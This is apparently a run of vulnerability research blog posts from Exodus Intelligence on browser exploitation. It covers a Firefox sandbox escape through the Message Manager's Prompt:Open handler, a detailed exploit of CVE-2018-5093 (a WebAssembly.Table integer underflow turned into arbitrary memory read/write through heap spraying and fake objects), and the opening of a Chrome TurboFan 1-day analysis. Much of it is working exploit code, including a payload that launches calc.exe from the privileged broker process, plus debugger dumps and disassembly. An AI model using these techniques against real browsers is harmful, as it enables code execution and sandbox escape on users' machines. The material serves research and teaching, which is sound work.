0dde67f0  5535b4e8 e5e5e5e5 e5e5e5e5 e5e5e5e5

0:033> dt 0x118c5100 mozilla::dom::NodeInfo
xul!mozilla::dom::NodeInfo
   +0x000 mRefCnt          : nsCycleCollectingAutoRefCnt
   =5597ee68 _cycleCollectorGlobal : mozilla::dom::NodeInfo::cycleCollection
   +0x004 mDocument        : 0x1154a800 nsIDocument
   +0x008 mInner           : mozilla::dom::NodeInfo::NodeInfoInner
   +0x020 mOwnerManager    : RefPtr<nsNodeInfoManager>
   +0x024 mQualifiedName   : nsString
   +0x030 mNodeName        : nsString
   +0x03c mLocalName       : nsString

0:033> dd 0x118c5100 
118c5100  00000004 1154a800 062c6160 00000000
118c5110  00000003 e5e50001 00000000 00000000
118c5120  06cc0130 5599a914 00000006 00000005
118c5130  118c6088 00000006 00000005 5599a914
118c5140  00000006 00000005 e5e5e5e5 e5e5e5e5
118c5150  0dc91550 00000000 00000000 00000000
118c5160  00000000 00000000 00000000 00000000
118c5170  00000000 00000000 00000000 00000000

0:033> dt 06cc0130 nsNodeInfoManager
xul!nsNodeInfoManager
   =5597efc0 _cycleCollectorGlobal : nsNodeInfoManager::cycleCollection
   +0x000 mRefCnt          : nsCycleCollectingAutoRefCnt
   +0x004 mNodeInfoHash    : 0x0db8d780 PLHashTable
   +0x008 mDocument        : 0x1154a800 nsIDocument
   +0x00c mNonDocumentNodeInfos : 0x12
   +0x010 mPrincipal       : nsCOMPtr<nsIPrincipal>
   +0x014 mDefaultPrincipal : nsCOMPtr<nsIPrincipal>
   +0x018 mTextNodeInfo    : 0x11872ab0 mozilla::dom::NodeInfo
   +0x01c mCommentNodeInfo : (null) 
   +0x020 mDocumentNodeInfo : 0x11872600 mozilla::dom::NodeInfo
   +0x024 mBindingManager  : RefPtr<nsBindingManager>
[skip]

We then write the value of the previously found system principal to offset 0x10 into this nsNodeInfoManager object.

Accessing Privileged JavaScript

Now we can load the privileged page about:newtab into our iframe and access the Components object with the JavaScript below.

iframe.src = 'about:newtab';
iframe.onload = function() {
    privilegedWindow = iframe.contentWindow;
    // Components object accessible via privilegedWindow.Components
};

Escaping the Content Process Sandbox

Here we describe a technique to execute privileged JavaScript in the broker process via Inter-process Communication from the content process. This technique was patched by a change intended to mitigate prompt spoofing by introducing a new type of prompt displayed by the broker process.

The content and broker processes communicate with each other via inter-process communication. While this is implemented and used by the C/C++ code, for Firefox there is an additional communication channel which is used by privileged JavaScript. It’s called the Message Manager and is responsible for passing messages between various windows.

The Message Manager was introduced long before the introduction of the sandbox, but the main goal was to support the legacy methods of interaction between the chrome and content while moving from single to multiple process architecture.

One such interaction is called RemotePrompt, shown below.

var RemotePrompt = {
  init: function() {
    let mm = Cc["@mozilla.org/globalmessagemanager;1"].getService(Ci.nsIMessageListenerManager);
    mm.addMessageListener("Prompt:Open", this);
  },

  receiveMessage: function(message) {
    switch (message.name) {
      case "Prompt:Open":
        if (message.data.uri) {
          this.openModalWindow(message.data, message.target);
        } else {
          this.openTabPrompt(message.data, message.target)
        }
        break;
    }
  },
[skip]
  openModalWindow: function(args, browser) {
    let window = browser.ownerGlobal;
    try {
      PromptUtils.fireDialogEvent(window, "DOMWillOpenModalDialog", browser);
      let bag = PromptUtils.objectToPropBag(args);

      Services.ww.openWindow(window, args.uri, "_blank",
                             "centerscreen,chrome,modal,titlebar", bag);

      PromptUtils.propBagToObject(bag, args);
    } finally {
      PromptUtils.fireDialogEvent(window, "DOMModalDialogClosed", browser);
      browser.messageManager.sendAsyncMessage("Prompt:Close", args);
    }
  }

The function receiveMessage() receives all incoming messages and handles only ones with the name Prompt:Open, and depending on the presence of the uri argument decides where to pass execution. If the argument is present, the function openModalWindow() will execute and create a new window in the broker process with the URI provided in the arguments. The newly created window has the system principal. By passing a data URI as the argument, arbitrary JavaScript code will be loaded and executed in the broker process.

Below is an example of this technique that will launch calc.exe from the broker process.

function executePayload(privilegedWindow) {
  var payload = [];
  // This is something to execute within privileged JavaScript. For example, 
  // in current case a calc.exe is executed with Medium Integrity Level.
  payload.push('var { interfaces: Ci, utils: Cu, classes: Cc } = Components;');
  payload.push('localFile = Cc["@mozilla.org/file/local;1"].createInstance(Ci.nsILocalFile);');
  payload.push('process = Cc["@mozilla.org/process/util;1"].createInstance(Ci.nsIProcess);');
  payload.push('args = [];');
  payload.push('localFile.initWithPath("C:\\\\WINDOWS\\\\system32\\\\calc.exe");');
  payload.push('process.init(localFile);');
  payload.push('process.run(false, args, args.length);');

  // This will get a ContentFrameMessageManager
  var cfmm = privilegedWindow.QueryInterface(Ci.nsIInterfaceRequestor).
    getInterface(Ci.nsIDocShell).
    QueryInterface(Ci.nsIInterfaceRequestor).
    getInterface(Ci.nsIContentFrameMessageManager);
  // This sends a message through the message manager to the broker process
  cfmm.sendAsyncMessage('Prompt:Open', { uri: 'data:text/html,<script>' + payload.join('') + '; close();</script>' });
}

The entire exploit chain is demonstrated in the video below.

Demo popping calc.exe

The post Firefox Vulnerability Research Part 2 appeared first on Exodus Intelligence.

Firefox Vulnerability Research

20 October 2020 at 16:54

By Arthur Gerkis and David Barksdale

This series of posts makes public some old Firefox research which our Zero-Day customers had access to before it was known publicly, and then our N-Day customers after it was patched. We’ve also used this research to teach browser exploitation in our Vuln-Dev Master Class.

In this post we start with an integer underflow in part of Firefox’s WebAssembly code and use it to read and write memory in the sandboxed content process. In later posts we will then use this to execute arbitrary code in the content process, and finally escape the sandbox to the broker process and execute calc.exe.

WebAssembly.Table Integer Underflow (CVE-2018-5093)

This vulnerability was reported to Mozilla by Alex Gaynor as Bug #1415291 and fixed in Firefox 58 and 59.

The vulnerability is triggered using a WebAssembly.Table object which represents an array-like structure that stores function references and provides a bridge between WebAssembly and JavaScript. The following JavaScript code results in a memory read outside the bounds of the table.

// Creates a new WebAssembly Table object.
var wasmTable = new WebAssembly.Table({
  // Provides type of the element.
  element: 'anyfunc',
  // Provides initial size of the table (length of the elements).
  initial: 0
});

// Tries to get the function reference at the index 0x100.
wasmTable.get(0x100);

The JavaScript constructor triggers a call to WasmTableObject::construct() shown below.

/* static */ WasmTableObject*
WasmTableObject::create(JSContext* cx, const Limits& limits)
{
    RootedObject proto(cx, &cx->global()->getPrototype(JSProto_WasmTable).toObject());

    AutoSetNewObjectMetadata metadata(cx);
    RootedWasmTableObject obj(cx, NewObjectWithGivenProto<WasmTableObject>(cx, proto));
    if (!obj)
        return nullptr;

    MOZ_ASSERT(obj->isNewborn());

    TableDesc td(TableKind::AnyFunction, limits);
    td.external = true;

    SharedTable table = Table::create(cx, td, obj);
    if (!table)
        return nullptr;

    obj->initReservedSlot(TABLE_SLOT, PrivateValue(table.forget().take()));

    MOZ_ASSERT(!obj->isNewborn());
    return obj;
}

/* static */ bool
WasmTableObject::construct(JSContext* cx, unsigned argc, Value* vp)
{
    CallArgs args = CallArgsFromVp(argc, vp);

    if (!ThrowIfNotConstructing(cx, args, "Table"))
        return false;

    if (!args.requireAtLeast(cx, "WebAssembly.Table", 1))
        return false;

    if (!args.get(0).isObject()) {
        JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr, JSMSG_WASM_BAD_DESC_ARG, "table");
        return false;
    }

...

    RootedWasmTableObject table(cx, WasmTableObject::create(cx, limits));
    if (!table)
        return false;

    args.rval().setObject(*table);
    return true;
}

WasmTableObject::construct() performs different kinds of validations and then calls WasmTableObject::create() which is responsible for the actual table creation.

The TableDesc object holds properties of the new WebAssembly.Table to be created including the type of the array (external or internal) and limits of the table. The call to Table::create() creates a new WebAssembly table object with the initial elements length of 0.

/* static */ SharedTable
Table::create(JSContext* cx, const TableDesc& desc, HandleWasmTableObject maybeObject)
{
    // The raw element type of a Table depends on whether it is external: an
    // external table can contain functions from multiple instances and thus
    // must store an additional instance pointer in each element.
    UniqueByteArray array;
    if (desc.external)
        array.reset((uint8_t*)cx->pod_calloc<ExternalTableElem>(desc.limits.initial));
    else
        array.reset((uint8_t*)cx->pod_calloc<void*>(desc.limits.initial));
    if (!array)
        return nullptr;

    return SharedTable(cx->new_<Table>(cx, desc, maybeObject, Move(array)));
}

The desc.external variable is set to true as it is an external (user-provided) table creation request (non-external tables are used for JavaScript engine runtime internally and are not possible to control directly). The desc.limits.initial variable is 0 and the pod_calloc() function allocates the minimum possible buffer size of 8 bytes. The address of array (or array_ as defined in Table fields) is the base address when accessing the table array by index.

Integer Underflow

Once the WebAssembly get() function is called, the WasmTableObject::getImpl() method is eventually called.

/* static */ bool
WasmTableObject::getImpl(JSContext* cx, const CallArgs& args)
{
    RootedWasmTableObject tableObj(cx, &args.thisv().toObject().as<WasmTableObject>());
    const Table& table = tableObj->table();

    uint32_t index;
    if (!ToNonWrappingUint32(cx, args.get(0), table.length() - 1, "Table", "get index", &index))
        return false;

    ExternalTableElem& elem = table.externalArray()[index];
    if (!elem.code) {
        args.rval().setNull();
        return true;
    }

    Instance& instance = *elem.tls->instance;
    const CodeRange& codeRange = *instance.code().lookupRange(elem.code);
    MOZ_ASSERT(codeRange.isFunction());

    RootedWasmInstanceObject instanceObj(cx, instance.object());
    RootedFunction fun(cx);
    if (!instanceObj->getExportedFunction(cx, instanceObj, codeRange.funcIndex(), &fun))
        return false;

    args.rval().setObject(*fun);
    return true;
}

The third argument to ToNonWrappingUint32() is the maximum value allowed to be stored in index. When table.length() is 0 this value becomes -1, however the argument type is uint32_t, causing the value to become UINT32_MAX, defeating the range check entirely. The same bug exists in WasmTableObject::setImpl() defeating the range check on set().

This vulnerability can be used to read or write past the bounds of the array. However,
writing out of bounds is limited in how and what it can write. Reading out of bounds cannot be directly used to leak any useful data into JavaScript, but it can be used to create a fake hash table.

Fake Hash Table

To ensure that required data is located at a fixed address the heap is sprayed using JavaScript arrays. This data is then used to create a few fake structures. The heap spray causes the following data to be placed at address 0x4d0f0000.

4d0f0000 4d0f0000 4d0f0000 4d0f000c 4d0f0000
4d0f0010 4d0eff9c 4d0f0028 4d0f00b0 4d0f0028
4d0f0020 4d0f0020 00000002 00000000 00000000
4d0f0030 4d0effd4 00000002 4d0f0030 00000000
4d0f0040 00000000 00000000 00000010 00000000
4d0f0050 00000000 00000000 00000000 00000000
4d0f0060 143d6170 ffffff87 00000000 00000000
4d0f0070 00000000 00000000 00000000 00000000
4d0f0080 0000007b 00000030 4d0f0080 cccccccc
4d0f0090 00000000 00000000 14642190 ffffff8c
4d0f00a0 00000000 00000000 13d59320 ffffff8c
4d0f00b0 cccccccc 7e000000 146421ea 00000000
4d0f00c0 00000000 00000000 00000000 00000000
4d0f00d0 00000000 00000000 00000000 00000000
4d0f00e0 00000000 00000000 00000000 00000000
4d0f00f0 00000000 00000000 00000000 00000000
4d0f0100 4d0f0000 4d0f0000 4d0f0000 4d0f0000
4d0f0110 4d0f0000 4d0f0000 4d0f0000 4d0f0000

The first 0x100 bytes contain fake structure fields, the rest is just a filler which points back to the beginning of the data.

Once the heap spray is done, the vulnerability is triggered by creating a new WebAssembly table and calling the get() function on that table. The following code is then reached.

; File: xul.dll
; Version: 54.0.0.6368

.text:11D4EB33 private: static bool __cdecl js::WasmTableObject::getImpl(struct JSContext *, class JS::CallArgs const &) proc near
...
.text:11D4EB96                 jz      loc_11D4EC40
.text:11D4EB9C                 mov     eax, [ebp+var_4]
.text:11D4EB9F                 mov     ecx, [ebp+var_8]
.text:11D4EBA2                 mov     eax, [eax+30h] ; eax will point to the array_ field
.text:11D4EBA5                 mov     edx, [eax+ecx*8] ; eax+ecx*8 points inside of the heap spray, edx becomes 0x4d0f0000
.text:11D4EBA8                 test    edx, edx        ; if (!elem.code) ... (edx = 0x4d0f0000)
.text:11D4EBAA                 jnz     short loc_11D4EBBF
...
.text:11D4EBBF
.text:11D4EBBF loc_11D4EBBF:
.text:11D4EBBF                 mov     eax, [eax+ecx*8+4] ; reads from the spray and sets eax to 4d0f0000
.text:11D4EBC3                 push    edx
.text:11D4EBC4                 mov     esi, [eax+4]    ; esi will point to the fake js::wasm::Instance object (4d0f0000)
.text:11D4EBC7                 mov     ecx, [esi+8]    ; ecx will point to the fake js::wasm::Code object (4d0f000c)
.text:11D4EBCA                 call    js::wasm::Code::lookupRange(void *)

The array_ field is located at offset 0x30 in the Table object, shown below.

0:000> dt xul!js::wasm::Table
   +0x000 mRefCnt          : Uint4B
   +0x004 maybeObject_     : js::ReadBarriered<js::WasmTableObject *>
   +0x008 observers_       : JS::WeakCache<JS::GCHashSet<js::ReadBarriered<js::WasmInstanceObject *>,js::MovableCellHasher<js::ReadBarriered<js::WasmInstanceObject *> >,js::SystemAllocPolicy> >
   +0x030 array_           : mozilla::UniquePtr<unsigned char [0],JS::FreePolicy>
   +0x034 kind_            : js::wasm::TableKind
   +0x038 length_          : Uint4B
   +0x03c maximum_         : mozilla::Maybe<unsigned int>
   +0x044 external_        : Bool

The address of the array_ field is added to the index which is multiplied by 0x8 (the UniqueByteArray structure takes 0x8 bytes and each function reference represents this structure).

Next is the call to the Code::lookupRange() method.

const CodeRange*
Code::lookupRange(void* pc) const
{
    CodeRange::PC target((uint8_t*)pc - segment_->base());
    size_t lowerBound = 0;
    size_t upperBound = metadata_->codeRanges.length();
    size_t match;
    if (!BinarySearch(metadata_->codeRanges, lowerBound, upperBound, target, &match))
        return nullptr;

    return &metadata_->codeRanges[match];
}

The Code object is located at address 0x4d0f000c in our heap spray and is constructed such that BinarySearch() will return true and match will be set to 1. The match is the index of the CodeRange structure in the metadata_->codeRanges vector. The size of the CodeRange object is 0x20 bytes and as such lookupRange() returns the CodeRange object which is located at address 0x4d0f0040 in our heap spray.

Next in WasmTableObject::getImpl() an object_ field pointing to the WasmInstanceObject object is requested, as shown below.

WasmInstanceObject*
Instance::object() const
{
    return object_;
}

A problem appears due to the way the garbage collector works and because some structures have been faked: they do not represent real JavaScript objects and have not gone through the real allocation mechanisms.

The Generation Garbage Collector (GGC), introduced in Mozilla Firefox version 32.0, has two heap types: nursery and tenured. The nursery heap is used for a short-lived objects, and the tenured heap for long-lived objects.

When getting the WasmInstanceObject object, the JavaScript engine runtime requests details about the object state, namely whether it is in the nursery or in the tenured heap. Eventually the JSObject::readBarrier() method is called, as shown below.

/* static */ MOZ_ALWAYS_INLINE void
JSObject::readBarrier(JSObject* obj)
{
    if (obj && obj->isTenured())
        obj->asTenured().readBarrier(&obj->asTenured());
}

The method Cell::isTenured() checks whether the object is inside of tenured heap, as shown below.

MOZ_ALWAYS_INLINE bool isTenured() const { return !IsInsideNursery(this); }

The IsInsideNursery() function is shown below.

MOZ_ALWAYS_INLINE bool
IsInsideNursery(const js::gc::Cell* cell)
{
    if (!cell)
        return false;
    uintptr_t addr = uintptr_t(cell);
    addr &= ~js::gc::ChunkMask;
    addr |= js::gc::ChunkLocationOffset;
    auto location = *reinterpret_cast<ChunkLocation*>(addr);
    MOZ_ASSERT(location == ChunkLocation::Nursery || location == ChunkLocation::TenuredHeap);
    return location == ChunkLocation::Nursery;
}

Cell is the base class of all classes being allocated by GC. Chunks are the largest unit used by the allocator and are 1MB. The ChunkLocation enum denotes the type of the heap, as shown below.

enum class ChunkLocation : uint32_t
{
    Invalid = 0,
    Nursery = 1,
    TenuredHeap = 2
};

The IsInsideNursery() function converts object addresses to the address of the associated chunk and checks whether the chunk belongs to the nursery or tenured heap. If it is in the tenured heap, then additional operations on the object are performed. This code path should be avoided as it would unnecessarily complicate the exploit. The ChunkLocation is within the our heap spray so we fake it by setting it to Nursery.

After that, the Instance::object() method successfully returns a new WasmInstanceObject object which is located at address 0x4d0f0000.

The next relevant call is to the WasmInstanceObject::getExportedFunction() method as it allows memory corruption at an arbitrary address. The method receives valid objects passed in as arguments and also receives the controllable funcIndex variable which we set to 0.

/* static */ bool
WasmInstanceObject::getExportedFunction(JSContext* cx, HandleWasmInstanceObject instanceObj,
                                        uint32_t funcIndex, MutableHandleFunction fun)
{
    if (ExportMap::Ptr p = instanceObj->exports().lookup(funcIndex)) {
        fun.set(p->value());
        return true;
    }

    const Instance& instance = instanceObj->instance();
    unsigned numArgs = instance.metadata().lookupFuncExport(funcIndex).sig().args().length();

    // asm.js needs to act like a normal JS function which means having the name
    // from the original source and being callable as a constructor.
    if (instance.isAsmJS()) {
        RootedAtom name(cx, instance.code().getFuncAtom(cx, funcIndex));
        if (!name)
            return false;

        fun.set(NewNativeConstructor(cx, WasmCall, numArgs, name, gc::AllocKind::FUNCTION_EXTENDED,
                                     SingletonObject, JSFunction::ASMJS_CTOR));
        if (!fun)
            return false;
    } else {
        RootedAtom name(cx, NumberToAtom(cx, funcIndex));
        if (!name)
            return false;

        fun.set(NewNativeFunction(cx, WasmCall, numArgs, name, gc::AllocKind::FUNCTION_EXTENDED));
        if (!fun)
            return false;
    }

    fun->setExtendedSlot(FunctionExtended::WASM_INSTANCE_SLOT, ObjectValue(*instanceObj));
    fun->setExtendedSlot(FunctionExtended::WASM_FUNC_INDEX_SLOT, Int32Value(funcIndex));

    if (!instanceObj->exports().putNew(funcIndex, fun)) {
        ReportOutOfMemory(cx);
        return false;
    }

    return true;
}

The instanceObj->exports() call returns a hash table. We fail the hash table lookup in order to reach the call to putNew(). Next, inside of the Metadata::lookupFuncExport() method, a second binary search is performed and it must return a result.

const FuncExport&
Metadata::lookupFuncExport(uint32_t funcIndex) const
{
    size_t match;
    if (!BinarySearch(ProjectFuncIndex(funcExports), 0, funcExports.length(), funcIndex, &match))
        MOZ_CRASH("missing function export");

    return funcExports[match];
}

The Metadata object is also fake and is located at address 0x4d0f0000. BinarySearch() calls BinarySearchIf() with arguments aContainer and aEnd under our control.

0:000> ln eip
win_build\\dist\\include\\mozilla\\binarysearch.h(80)+0xe
(035d1c00)   xul!mozilla::BinarySearchIf<ProjectFuncIndex,mozilla::detail::BinarySearchDefaultComparator<unsigned int> >+0x1e   |  (035d1c60)   xul!mozilla::BinarySearchIf<mozilla::Vector<js::wasm::Instance *,0,js::SystemAllocPolicy>,InstanceComparator>

0:000> dv
            aContainer = 0x012fe074
                aBegin = 0
                  aEnd = 2
              aCompare = 0x012fe078
aMatchOrInsertionPoint = 0x012fe070
                  high = 2
                   low = 0
                middle = <value unavailable>

0:000> dx -r1 (*((xul!ProjectFuncIndex *)0x12fe074))
(*((xul!ProjectFuncIndex *)0x12fe074))                 [Type: ProjectFuncIndex]
    [+0x000] funcExports      : 0x4d0f0030 [Type: mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy> &]

0:000> dx -r1 (*((xul!mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy> *)0x4d0f0030))
(*((xul!mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy> *)0x4d0f0030))                 [Type: mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy>]
    kElemIsPod       : false [Type: bool]
    kMaxInlineBytes  : 0x3f3 [Type: unsigned int]
    kInlineCapacity  : 0x0 [Type: unsigned int]
    [+0x000] mBegin           : 0x4d0effd4 [Type: js::wasm::FuncExport *]
    [+0x004] mLength          : 0x2 [Type: unsigned int]
    [+0x008] mTail            [Type: mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy>::CRAndStorage<0,0>]
    sMaxInlineStorage : 0x0 [Type: unsigned int]

Address 0x4d0f0040 contains 0 in order to return true from BinarySearchIf().

; File: xul.dll
; Version: 54.0.0.6368

.text:11D666D2 bool __cdecl mozilla::BinarySearchIf<struct ProjectFuncIndex, class mozilla::detail::BinarySearchDefaultComparator<unsigned int>>(struct ProjectFuncIndex const &, unsigned int, unsigned int, class mozilla::detail::BinarySearchDefaultComparator<unsigned int> const &, unsigned int *) proc near
.text:11D666D2
.text:11D666D2 arg_0           = dword ptr  8
.text:11D666D2 arg_4           = dword ptr  0Ch
.text:11D666D2 arg_8           = dword ptr  10h
.text:11D666D2
...
.text:11D666E5
.text:11D666E5 loc_11D666E5:
.text:11D666E5                 mov     ecx, [ebp+arg_4]
.text:11D666E8                 mov     edx, edi
.text:11D666EA                 sub     edx, esi
.text:11D666EC                 shr     edx, 1
.text:11D666EE                 add     edx, esi
.text:11D666F0                 imul    eax, edx, 3Ch   ; edx = 0x1
.text:11D666F3                 mov     eax, [eax+ebx+30h] ; mov eax,dword ptr [eax+ebx+30h] ds:002b:4d0f0040=00000000
.text:11D666F7                 mov     [ebp+arg_0], eax
.text:11D666FA                 lea     eax, [ebp+arg_0]
.text:11D666FD                 push    eax
.text:11D666FE                 call    mozilla::detail::BinarySearchDefaultComparator<uint>::operator()<uint>(uint const &)
.text:11D66703                 test    eax, eax        ; eax = 0x0, will return from the function
.text:11D66705                 jz      short loc_11D66720
...
.text:11D6671B loc_11D6671B:
.text:11D6671B                 pop     edi
.text:11D6671C                 pop     esi
.text:11D6671D                 pop     ebx
.text:11D6671E                 pop     ebp
.text:11D6671F                 retn
.text:11D66720 ; ---------------------------------------------------------------------------
.text:11D66720
.text:11D66720 loc_11D66720:
.text:11D66720                 mov     eax, [ebp+arg_8]
.text:11D66723                 mov     [eax], edx
.text:11D66725                 mov     al, 1
.text:11D66727                 jmp     short loc_11D6671B
.text:11D66727 bool __cdecl mozilla::BinarySearchIf<struct ProjectFuncIndex, class mozilla::detail::BinarySearchDefaultComparator<unsigned int>>(struct ProjectFuncIndex const &, unsigned int, unsigned int, class mozilla::detail::BinarySearchDefaultComparator<unsigned int> const &, unsigned int *) endp

This brings us to the call to putNew() which will try to put the key funcIndex and the value fun into the hash table.

    template <typename... Args>
    MOZ_MUST_USE bool putNew(const Lookup& l, Args&&... args)
    {
        if (!this->checkSimulatedOOM())
            return false;

        if (!EnsureHash<HashPolicy>(l))
            return false;

        if (checkOverloaded() == RehashFailed)
            return false;

        putNewInfallible(l, mozilla::Forward<Args>(args)...);
        return true;
    }

The HashTable::putNew() method wraps a call to HashTable::putNewInfallible(), shown below.

    template <typename... Args>
    void putNewInfallible(const Lookup& l, Args&&... args)
    {
        MOZ_ASSERT(!lookup(l).found());
        mozilla::ReentrancyGuard g(*this);
        putNewInfallibleInternal(l, mozilla::Forward<Args>(args)...);
    }

Which in turn wraps another call to HashTable::putNewInfallibleInternal(), shown below.

    template <typename... Args>
    void putNewInfallibleInternal(const Lookup& l, Args&&... args)
    {
        MOZ_ASSERT(table);

        HashNumber keyHash = prepareHash(l);
        Entry* entry = &findFreeEntry(keyHash);
...
    }

The HashTable::prepareHash() method calculates the hash for the given key and in our case will return 0xfffffffe. This will cause findFreeEntry() to corrupt the JSValueTag at 0x4d0f0064, changing it from JSVAL_TAG_STRING (0xffffff86) to JSVAL_TAG_SYMBOL (0xffffff87), as shown below.

; File: xul.dll
; Version: 54.0.0.6368

.text:10BE112F private: class js::detail::HashTableEntry<class js::HashMapEntry<unsigned int, class js::jit::MDefinition *>> & __thiscall js::detail::HashTable<class js::HashMapEntry<unsigned int, class js::jit::MDefinition *>, struct js::HashMap<unsigned int, class js::jit::MDefinition *, struct js::DefaultHasher<unsigned int>, class js::SystemAllocPolicy>::MapHashPolicy, class js::SystemAllocPolicy>::findFreeEntry(unsigned int) proc near
.text:10BE112F
.text:10BE112F var_4           = dword ptr -4
.text:10BE112F arg_0           = dword ptr  8
.text:10BE112F
.text:10BE112F                 push    ebp
.text:10BE1130                 mov     ebp, esp
.text:10BE1132                 push    ecx
.text:10BE1133                 push    ebx
.text:10BE1134                 push    esi
.text:10BE1135                 mov     ebx, ecx
.text:10BE1137                 push    edi
.text:10BE1138                 mov     edi, [ebp+arg_0]
.text:10BE113B                 mov     esi, edi
.text:10BE113D                 movzx   ecx, byte ptr [ebx+7] ; movzx ecx,byte ptr [ebx+7]       ds:002b:4d0f00b7=7e
.text:10BE1141                 shr     esi, cl         ; 0xfffffffe >>> 0x7e, esi becomes 0x3 (in inlined hash1() call)
.text:10BE1143                 mov     edx, esi
.text:10BE1145                 mov     [ebp+var_4], ecx
.text:10BE1148                 shl     edx, 4
.text:10BE114B                 add     edx, [ebx+8]    ; add edx,dword ptr [ebx+8] ds:002b:4d0f00b8=4d0f0034 (edx = 0x30)
.text:10BE114E                 cmp     dword ptr [edx], 1 ; cmp dword ptr [edx],1    ds:002b:4d0f0064=ffffff86 (inlined entry->isLive())
.text:10BE1151                 jbe     short loc_10BE1180
.text:10BE1153                 push    20h ; start of inlined hash2() call
.text:10BE1155                 pop     eax
.text:10BE1156                 sub     eax, ecx
.text:10BE1158                 mov     ecx, eax
.text:10BE115A                 shl     edi, cl
.text:10BE115C                 mov     ecx, [ebp+var_4]
.text:10BE115F                 shr     edi, cl
.text:10BE1161                 mov     ecx, eax
.text:10BE1163                 xor     eax, eax
.text:10BE1165                 or      edi, 1
.text:10BE1168                 inc     eax
.text:10BE1169                 shl     eax, cl
.text:10BE116B                 dec     eax ; end of inlined hash2() call
.text:10BE116C
.text:10BE116C loc_10BE116C:
.text:10BE116C                 or      dword ptr [edx], 1 ; or dword ptr [edx],1    ds:002b:4d0f0064=ffffff86 (inlined entry->setCollision() call)
.text:10BE116F                 sub     esi, edi
.text:10BE1171                 and     esi, eax
.text:10BE1173                 mov     edx, esi
.text:10BE1175                 shl     edx, 4
.text:10BE1178                 add     edx, [ebx+8]
.text:10BE117B                 cmp     dword ptr [edx], 1 ; (inlined entry->isLive())
.text:10BE117E                 ja      short loc_10BE116C ;
.text:10BE1180
.text:10BE1180 loc_10BE1180:
.text:10BE1180                 pop     edi
.text:10BE1181                 pop     esi
.text:10BE1182                 mov     eax, edx
.text:10BE1184                 pop     ebx
.text:10BE1185                 mov     esp, ebp
.text:10BE1187                 pop     ebp
.text:10BE1188                 retn    4

Fake Symbol

The heap spray contains a JSString at address 0x4d0f0060, as shown below.

0:000> dd 4d0f0060
4d0f0060  13cd01a0 ffffff86 00000000 00000000
4d0f0070  00000000 00000000 00000000 00000000
4d0f0080  0000007b 00000030 4d0f0080 cccccccc
4d0f0090  00000000 00000000 16712200 ffffff8c
4d0f00a0  00000000 00000000 09eb3360 ffffff8c

After corrupting the JSValueTag, the string becomes a fake JS::Symbol object. By calling toString() on the fake symbol, 0x30 bytes from address 0x4d0f0080 are leaked. This includes the address of a TypedArray object at 0x4d0f0098 and the address of an iframe at 0x4d0f00a8 to be used later.

Arbitrary Memory Read/Write

Once the address of the TypedArray object has been leaked, the corrupted part of the heap spray is restored to its original contents and the write address is updated to point to the unaligned address of the length field of the TypedArray object. The vulnerability is then triggered a second time. Below is the contents of the Typed Array object before.

0:000> dd 14642200
14642200  143f4cb8 1463fa18 00000000 04bf7198
14642210  00000000 ffffff83 00000010 ffffff81
14642220  00000000 ffffff81 14642230 00000000
14642230  00000000 00000000 00000000 00000000
14642240  00000000 00000000 00000000 00000000
14642250  00000000 00000000 00010000 00000000
14642260  00000000 00000000 00000000 00000000
14642270  143f4cb8 1463fa18 00000000 04bf7198

At address 0x14642218 the TypedArray length is located, the data buffer starts at 0x14642230, and the next TypedArray is located at address 0x14642270. Below is the contents after the write changes the length from 0x10 to 0x10010.

0:000> dd 14642200
14642200  143f4cb8 1463fa18 00000000 04bf7198
14642210  00000000 ffffff83 00010010 ffffff81
14642220  00000000 ffffff81 14642230 00000000
14642230  00000000 00000000 00000000 00000000
14642240  00000000 00000000 00000000 00000000
14642250  00000000 00000000 00010000 00000000
14642260  00000000 00000000 00000000 00000000
14642270  143f4cb8 1463fa18 00000000 04bf7198

The corrupted TypedArray is then used to overwrite length of the next adjacent TypedArray with 0xffffffff. This way arbitrary memory read/write is achieved.

Animation showing the vulnerability being exploited.

In the next post in this series we will use the ability to read and write arbitrary memory to achieve code execution.

The post Firefox Vulnerability Research appeared first on Exodus Intelligence.

A EULOGY FOR PATCH-GAPPING CHROME

24 February 2020 at 14:01

Authors: István Kurucsai and Vignesh S Rao

In 2019 we looked at patch gapping Chrome on two separate occasions. The conclusion was that exploiting 1day vulnerabilities well before the fixes were distributed through the stable channel is feasible and allows potential attackers to have 0day-like capabilities with only known vulnerabilities. This was the result of a combination of factors:

  • the 6-week release-cycle of Chrome that only included occasional releases in-between
  • the open-source development model that makes security fixes public before they are released to end-users
  • this is compounded by the fact that regression tests are often included with patches, reducing exploit development time significantly. It is often the case that achieving the initial corruption is the hardest part of a browser/JS engine exploit as the rest can be relatively easily reused

Mozilla seems to tackle the issue by withholding security-critical fixes from public source repositories right up to the point of a release and not including regressions tests with them. Google went with an aggressive release schedule, first to a biweekly cycle for stable, then pushing it even further with what appears to be weekly releases in February.

This post tries to examine if leveraging 1day vulnerabilities in Chrome is still practical by analyzing and exploiting a vulnerability in TurboFan. Some details of v8 that were already discussed in our previous posts will be glossed over, so we would recommend reading them as a refresher.

The vulnerability

We will be looking at Chromium issue 1053604 (restricted for the time being), fixed on the 19th of February. It has all the characteristics of a promising 1day candidate: simple but powerful-looking regression test, incorrect modeling of side-effects, easy to understand one-line change. The CL with the patch can be found here, the abbreviated code of the affected function can be seen below.

NodeProperties::InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
  JSHeapBroker* broker, Node* receiver, Node* effect,
  ZoneHandleSet<Map>* maps_return) {
    ...
    InferReceiverMapsResult result = kReliableReceiverMaps;
    while (true) {
      switch (effect->opcode()) {
      ...
        case IrOpcode::kCheckMaps: {
          Node* const object = GetValueInput(effect, 0);
          if (IsSame(receiver, object)) {
            *maps_return = CheckMapsParametersOf(effect->op()).maps();
            return result;
          }
          break;
        }
        case IrOpcode::kJSCreate: {
          if (IsSame(receiver, effect)) {
            base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
            if (initial_map.has_value()) {
              *maps_return = ZoneHandleSet<Map>(initial_map->object());
              return result;
            }
            // We reached the allocation of the {receiver}.
            return kNoReceiverMaps;
          }
+         result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.
          break;
        }
      ...  
      }
      // Stop walking the effect chain once we hit the definition of
      // the {receiver} along the {effect}s.
